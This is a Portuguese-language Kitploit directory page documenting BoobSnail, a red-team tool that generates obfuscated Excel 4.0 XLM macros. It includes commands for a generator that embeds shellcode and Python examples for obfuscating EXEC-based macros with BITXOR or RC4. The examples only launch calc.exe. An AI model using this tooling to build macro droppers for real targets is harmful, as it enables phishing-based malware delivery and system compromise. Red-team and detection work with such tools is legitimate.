Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/stmcyber/boobsnail
Ferramentas de PhishingGeração de PayloadsTestes de PenetraçãoEngenharia SocialRed Teaming
GitHubstmcyber/boobsnail

boobsnail

Gere macros XLM do Excel 4.0 ofuscadas para operações de equipe vermelha e análise de equipe azul, com suporte para múltiplas técnicas de infecção, tradução de fórmulas e geradores personalizados baseados em bibliotecas.

Ver Repositório
25649há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

License

Siga-nos no Twitter!

BoobSnail

BoobSnail permite gerar macros XLM (Excel 4.0). Seu objetivo é apoiar o RedTeam e o BlueTeam na geração de macros XLM. Recursos:

  • várias técnicas de infecção;
  • várias técnicas de ofuscação;
  • tradução de fórmulas para outros idiomas que não o inglês;
  • pode ser usado como biblioteca - você pode facilmente escrever seu próprio gerador.

Compilação e Execução

Testado em: Python 3.8.7rc1

root@kitploit:~
pip install -r requirements.txt
python boobsnail.py
___.                ___.     _________             .__.__
\_ |__   ____   ____\_ |__  /   _____/ ____ _____  |__|  |
 | __ \ /  _ \ /  _ \| __ \ \_____  \ /    \__  \ |  |  |
 | \_\ (  <_> |  <_> ) \_\ \/        \   |  \/ __ \|  |  |__
 |___  /\____/ \____/|___  /_______  /___|  (____  /__|____/
     \/                  \/        \/     \/     \/
     Author: @_mzer0 @stm_cyber
     (...)

Uso dos Geradores

root@kitploit:~
python boobsnail.py <generator> -h

Para exibir os geradores disponíveis, digite:

root@kitploit:~
python boobsnail.py

Exemplos

Gera macro ofuscada que injeta shellcode x64 ou x86:

root@kitploit:~
python boobsnail.py Excel4NtDonutGenerator --inputx86 <CAMINHO_PARA_SHELLCODE> --inputx64 <CAMINHO_PARA_SHELLCODE> --out boobsnail.csv

Gera macro ofuscada que executa calc.exe:

root@kitploit:~
python boobsnail.py Excel4ExecGenerator --cmd "powershell.exe -c calc.exe" --out boobsnail.csv

Salvando a saída no Excel

  1. Despeje a saída em um arquivo CSV.
  2. Copie o conteúdo do arquivo CSV.
  3. Execute o Excel e crie uma nova planilha.
  4. Adicione uma nova Macro Excel 4.0 (clique com o botão direito em Sheet1 -> Inserir -> MS Excel 4.0 Macro).
  5. Cole o conteúdo na célula A1 ou R1C1.
  6. Clique em Dados -> Texto para Colunas.
  7. Clique em Avançar -> Defina Ponto e vírgula como separador e clique em Concluir.

Uso da Biblioteca

BoobSnail compartilha a biblioteca excel4lib que permite criar seu próprio gerador de macro Excel4. excel4lib contém algumas classes que podem ser usadas durante a escrita do gerador:

  • excel4lib.macro.Excel4Macro - permite definir fórmulas Excel4, variáveis de valores;
  • excel4lib.macro.obfuscator.Excel4Obfuscator - permite ofuscar instruções criadas no Excel4Macro;
  • excel4lib.lang.Excel4Translator - permite traduzir fórmulas para outro idioma.

A ideia principal desta biblioteca é representar fórmulas Excel4, variáveis, argumentos de fórmulas e valores como objetos python. Graças a isso, você pode alterar atributos de instruções, como nomes de fórmulas ou variáveis, valores, endereços, etc., de forma fácil. Por exemplo, vamos criar uma macro simples que executa calc.exe

root@kitploit:~
from excel4lib.macro import *
# Cria objeto macro
macro = Excel4Macro("test.csv")
# Adiciona variável chamada cmd com valor "calc.exe" à planilha
cmd = macro.variable("cmd", "calc.exe")
# Adiciona fórmula EXEC com argumento cmd
macro.formula("EXEC", cmd)
# Despeja em CSV
print(macro.to_csv())

Resultado:

root@kitploit:~
cmd="calc.exe";
=EXEC(cmd);

Agora, digamos que você queira ofuscar sua macro. Para isso, basta importar o ofuscador e passá-lo para o objeto Excel4Macro:

root@kitploit:~
from excel4lib.macro import *
from excel4lib.macro.obfuscator import *
# Cria objeto macro
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Adiciona variável chamada cmd com valor "calc.exe" à planilha
cmd = macro.variable("cmd", "calc.exe")
# Adiciona fórmula EXEC com argumento cmd
macro.formula("EXEC", cmd)
# Despeja em CSV
print(macro.to_csv())

Por enquanto, o excel4lib oferece duas classes de ofuscação:

  • excel4lib.macro.obfuscator.Excel4Obfuscator usa funções do Excel 4.0 como BITXOR, SUM, etc. para ofuscar sua macro;
  • excel4lib.macro.obfuscator.Excel4Rc4Obfuscator usa criptografia RC4 para ofuscar fórmulas.

Como você pode ver, você pode escrever sua própria classe de ofuscador e usá-la no Excel4Macro.

Às vezes você precisará traduzir sua macro para outro idioma, por exemplo, seu idioma nativo, no meu caso é o polonês. Com o excel4lib é bastante fácil. Você só precisa importar a classe Excel4Translator e chamar set_language

root@kitploit:~
from excel4lib.macro import *
from excel4lib.lang.excel4_translator import *
# Altera o idioma
Excel4Translator.set_language("pl_PL")
# Cria objeto macro
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Adiciona variável chamada cmd com valor "calc.exe" à planilha
cmd = macro.variable("cmd", "calc.exe")
# Adiciona fórmula EXEC com argumento cmd
macro.formula("EXEC", cmd)
# Despeja em CSV
print(macro.to_csv())

Resultado:

root@kitploit:~
cmd="calc.exe";
=URUCHOM.PROGRAM(cmd);

Por enquanto, apenas os idiomas inglês e polonês são suportados. Se você quiser usar outro idioma, precisa adicionar traduções no diretório excel4lib/lang/langs.

Certamente, você precisará criar uma fórmula que recebe outra fórmula como argumento. Você pode fazer isso usando a função Excel4Macro.argument.

root@kitploit:~
from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Adiciona variável chamada cmd com valor "calc" à planilha
cmd_1 = macro.variable("cmd", "calc")
# Adiciona célula contendo .exe como valor
cmd_2 = macro.value(".exe")
# Cria fórmula CONCATENATE que CONCATENA cmd_1 e cmd_2
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Passa a chamada CONCATENATE como argumento para a fórmula EXEC
macro.formula("EXEC", exec_arg)
# Despeja em CSV
print(macro.to_csv())

Resultado:

root@kitploit:~
cmd="calc";
.exe;
=EXEC(CONCATENATE(cmd,R2C1));

Como você pode ver, a string ".exe" foi passada para a fórmula CONCATENATE como R2C1. R2C1 é o endereço do valor ".exe" (LINHA número 2 e COLUNA número 1). excel4lib retorna referências a fórmulas, valores como endereços. Referências a variáveis são retornadas como seus nomes. Você provavelmente notou que a classe Excel4Macro adiciona fórmulas, variáveis, valores à planilha automaticamente na ordem em que esses objetos são criados e que o endereço inicial é R1C1. E se você quiser colocar fórmulas em outra coluna ou linha? Você pode fazer isso chamando a função Excel4Macro.set_cords.

root@kitploit:~
from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Coluna 1
# Adiciona variável chamada cmd com valor "calc" à planilha
cmd_1 = macro.variable("cmd", "calc")
# Adiciona célula contendo .exe como valor
cmd_2 = macro.value(".exe")
# Coluna 2
# Altera coordenadas para coluna 2
macro.set_cords(2,1)
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Passa a chamada CONCATENATE como argumento para a fórmula EXEC
exec_call = macro.formula("EXEC", exec_arg)
# Coluna 1
# Volta para coluna 1. Altera coordenadas para coluna 1 e linha 3
macro.set_cords(1,3)
# GOTO na chamada EXEC
macro.goto(exec_call)
# Despeja em CSV
print(macro.to_csv())

Resultado:

root@kitploit:~
cmd="calc";=EXEC(CONCATENATE(cmd,R2C1));
.exe;;
=GOTO(R1C2);;

Autor

mzer0 da equipe stm_cyber!

Artigos

O primeiro passo no Excel 4.0 para Red Team

BoobSnail - Gerador de macro Excel 4.0

Baixar ferramenta